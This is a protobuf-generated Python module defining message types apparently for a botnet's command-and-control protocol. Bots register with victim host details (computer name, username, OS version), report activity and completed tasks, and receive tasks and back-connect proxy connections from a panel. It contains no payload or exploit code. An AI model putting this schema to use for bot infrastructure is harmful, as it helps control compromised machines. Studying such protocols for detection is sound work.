# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: test1.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import descriptor_pool as _descriptor_pool
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)

_sym_db = _symbol_database.Default()




DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(b'\n\x0btest1.proto\"\xce\x02\n\x06\x42otMsg\x1aZ\n\x06\x43onfig\x12&\n\thost_list\x18\x01 \x03(\x0b\x32\x13.BotMsg.Config.Host\x1a(\n\x04Host\x12\x10\n\x08is_https\x18\x01 \x01(\x08\x12\x0e\n\x06\x64omain\x18\x02 \x01(\x0c\x1a\x89\x01\n\x0bRegisterBot\x12\x0b\n\x03uid\x18\x01 \x01(\x0c\x12\x14\n\x0c\x63omputername\x18\x02 \x01(\x0c\x12\x10\n\x08username\x18\x03 \x01(\x0c\x12\x10\n\x08os_major\x18\x04 \x01(\x05\x12\x10\n\x08os_minor\x18\x05 \x01(\x05\x12\x0e\n\x06is_x64\x18\x06 \x01(\x08\x12\x11\n\tis_server\x18\x07 \x01(\x08\x1a\x1d\n\x0e\x41\x63tivityReport\x12\x0b\n\x03uid\x18\x01 \x01(\x0c\x1a=\n\rTaskCompleted\x12\x0b\n\x03uid\x18\x01 \x01(\x0c\x12\x0f\n\x07task_id\x18\x02 \x01(\x0c\x12\x0e\n\x06result\x18\x03 \x01(\x08\"\x8c\x01\n\x08PanelMsg\x1a\x33\n\x12RegistrationResult\x12\r\n\x05\x64ummy\x18\x01 \x01(\x08\x12\x0e\n\x06result\x18\x02 \x01(\x08\x1aK\n\x0cTaskGiveaway\x12\x0f\n\x07task_id\x18\x01 \x01(\x0c\x12\x0c\n\x04type\x18\x02 \x01(\x05\x12\x0e\n\x06server\x18\x03 \x01(\t\x12\x0c\n\x04port\x18\x04 \x01(\x05\"y\n\x0e\x42\x61\x63kConnectMsg\x1a\x38\n\rNewConnection\x12\x0b\n\x03uid\x18\x01 \x01(\x0c\x12\x0c\n\x04type\x18\x02 \x01(\x05\x12\x0c\n\x04port\x18\x03 \x01(\x05\x1a-\n\x10\x43onnectionClosed\x12\x0b\n\x03uid\x18\x01 \x01(\x0c\x12\x0c\n\x04type\x18\x02 \x01(\x05\x62\x06proto3')



_BOTMSG = DESCRIPTOR.message_types_by_name['BotMsg']
_BOTMSG_CONFIG = _BOTMSG.nested_types_by_name['Config']
_BOTMSG_CONFIG_HOST = _BOTMSG_CONFIG.nested_types_by_name['Host']
_BOTMSG_REGISTERBOT = _BOTMSG.nested_types_by_name['RegisterBot']
_BOTMSG_ACTIVITYREPORT = _BOTMSG.nested_types_by_name['ActivityReport']
_BOTMSG_TASKCOMPLETED = _BOTMSG.nested_types_by_name['TaskCompleted']
_PANELMSG = DESCRIPTOR.message_types_by_name['PanelMsg']
_PANELMSG_REGISTRATIONRESULT = _PANELMSG.nested_types_by_name['RegistrationResult']
_PANELMSG_TASKGIVEAWAY = _PANELMSG.nested_types_by_name['TaskGiveaway']
_BACKCONNECTMSG = DESCRIPTOR.message_types_by_name['BackConnectMsg']
_BACKCONNECTMSG_NEWCONNECTION = _BACKCONNECTMSG.nested_types_by_name['NewConnection']
_BACKCONNECTMSG_CONNECTIONCLOSED = _BACKCONNECTMSG.nested_types_by_name['ConnectionClosed']
BotMsg = _reflection.GeneratedProtocolMessageType('BotMsg', (_message.Message,), {

  'Config' : _reflection.GeneratedProtocolMessageType('Config', (_message.Message,), {

    'Host' : _reflection.GeneratedProtocolMessageType('Host', (_message.Message,), {
      'DESCRIPTOR' : _BOTMSG_CONFIG_HOST,
      '__module__' : 'test1_pb2'
      # @@protoc_insertion_point(class_scope:BotMsg.Config.Host)
      })
    ,
    'DESCRIPTOR' : _BOTMSG_CONFIG,
    '__module__' : 'test1_pb2'
    # @@protoc_insertion_point(class_scope:BotMsg.Config)
    })
  ,

  'RegisterBot' : _reflection.GeneratedProtocolMessageType('RegisterBot', (_message.Message,), {
    'DESCRIPTOR' : _BOTMSG_REGISTERBOT,
    '__module__' : 'test1_pb2'
    # @@protoc_insertion_point(class_scope:BotMsg.RegisterBot)
    })
  ,

  'ActivityReport' : _reflection.GeneratedProtocolMessageType('ActivityReport', (_message.Message,), {
    'DESCRIPTOR' : _BOTMSG_ACTIVITYREPORT,
    '__module__' : 'test1_pb2'
    # @@protoc_insertion_point(class_scope:BotMsg.ActivityReport)
    })
  ,

  'TaskCompleted' : _reflection.GeneratedProtocolMessageType('TaskCompleted', (_message.Message,), {
    'DESCRIPTOR' : _BOTMSG_TASKCOMPLETED,
    '__module__' : 'test1_pb2'
    # @@protoc_insertion_point(class_scope:BotMsg.TaskCompleted)
    })
  ,
  'DESCRIPTOR' : _BOTMSG,
  '__module__' : 'test1_pb2'
  # @@protoc_insertion_point(class_scope:BotMsg)
  })
_sym_db.RegisterMessage(BotMsg)
_sym_db.RegisterMessage(BotMsg.Config)
_sym_db.RegisterMessage(BotMsg.Config.Host)
_sym_db.RegisterMessage(BotMsg.RegisterBot)
_sym_db.RegisterMessage(BotMsg.ActivityReport)
_sym_db.RegisterMessage(BotMsg.TaskCompleted)

PanelMsg = _reflection.GeneratedProtocolMessageType('PanelMsg', (_message.Message,), {

  'RegistrationResult' : _reflection.GeneratedProtocolMessageType('RegistrationResult', (_message.Message,), {
    'DESCRIPTOR' : _PANELMSG_REGISTRATIONRESULT,
    '__module__' : 'test1_pb2'
    # @@protoc_insertion_point(class_scope:PanelMsg.RegistrationResult)
    })
  ,

  'TaskGiveaway' : _reflection.GeneratedProtocolMessageType('TaskGiveaway', (_message.Message,), {
    'DESCRIPTOR' : _PANELMSG_TASKGIVEAWAY,
    '__module__' : 'test1_pb2'
    # @@protoc_insertion_point(class_scope:PanelMsg.TaskGiveaway)
    })
  ,
  'DESCRIPTOR' : _PANELMSG,
  '__module__' : 'test1_pb2'
  # @@protoc_insertion_point(class_scope:PanelMsg)
  })
_sym_db.RegisterMessage(PanelMsg)
_sym_db.RegisterMessage(PanelMsg.RegistrationResult)
_sym_db.RegisterMessage(PanelMsg.TaskGiveaway)

BackConnectMsg = _reflection.GeneratedProtocolMessageType('BackConnectMsg', (_message.Message,), {

  'NewConnection' : _reflection.GeneratedProtocolMessageType('NewConnection', (_message.Message,), {
    'DESCRIPTOR' : _BACKCONNECTMSG_NEWCONNECTION,
    '__module__' : 'test1_pb2'
    # @@protoc_insertion_point(class_scope:BackConnectMsg.NewConnection)
    })
  ,

  'ConnectionClosed' : _reflection.GeneratedProtocolMessageType('ConnectionClosed', (_message.Message,), {
    'DESCRIPTOR' : _BACKCONNECTMSG_CONNECTIONCLOSED,
    '__module__' : 'test1_pb2'
    # @@protoc_insertion_point(class_scope:BackConnectMsg.ConnectionClosed)
    })
  ,
  'DESCRIPTOR' : _BACKCONNECTMSG,
  '__module__' : 'test1_pb2'
  # @@protoc_insertion_point(class_scope:BackConnectMsg)
  })
_sym_db.RegisterMessage(BackConnectMsg)
_sym_db.RegisterMessage(BackConnectMsg.NewConnection)
_sym_db.RegisterMessage(BackConnectMsg.ConnectionClosed)

if _descriptor._USE_C_DESCRIPTORS == False:

  DESCRIPTOR._options = None
  _BOTMSG._serialized_start=16
  _BOTMSG._serialized_end=350
  _BOTMSG_CONFIG._serialized_start=26
  _BOTMSG_CONFIG._serialized_end=116
  _BOTMSG_CONFIG_HOST._serialized_start=76
  _BOTMSG_CONFIG_HOST._serialized_end=116
  _BOTMSG_REGISTERBOT._serialized_start=119
  _BOTMSG_REGISTERBOT._serialized_end=256
  _BOTMSG_ACTIVITYREPORT._serialized_start=258
  _BOTMSG_ACTIVITYREPORT._serialized_end=287
  _BOTMSG_TASKCOMPLETED._serialized_start=289
  _BOTMSG_TASKCOMPLETED._serialized_end=350
  _PANELMSG._serialized_start=353
  _PANELMSG._serialized_end=493
  _PANELMSG_REGISTRATIONRESULT._serialized_start=365
  _PANELMSG_REGISTRATIONRESULT._serialized_end=416
  _PANELMSG_TASKGIVEAWAY._serialized_start=418
  _PANELMSG_TASKGIVEAWAY._serialized_end=493
  _BACKCONNECTMSG._serialized_start=495
  _BACKCONNECTMSG._serialized_end=616
  _BACKCONNECTMSG_NEWCONNECTION._serialized_start=513
  _BACKCONNECTMSG_NEWCONNECTION._serialized_end=569
  _BACKCONNECTMSG_CONNECTIONCLOSED._serialized_start=571
  _BACKCONNECTMSG_CONNECTIONCLOSED._serialized_end=616
# @@protoc_insertion_point(module_scope)
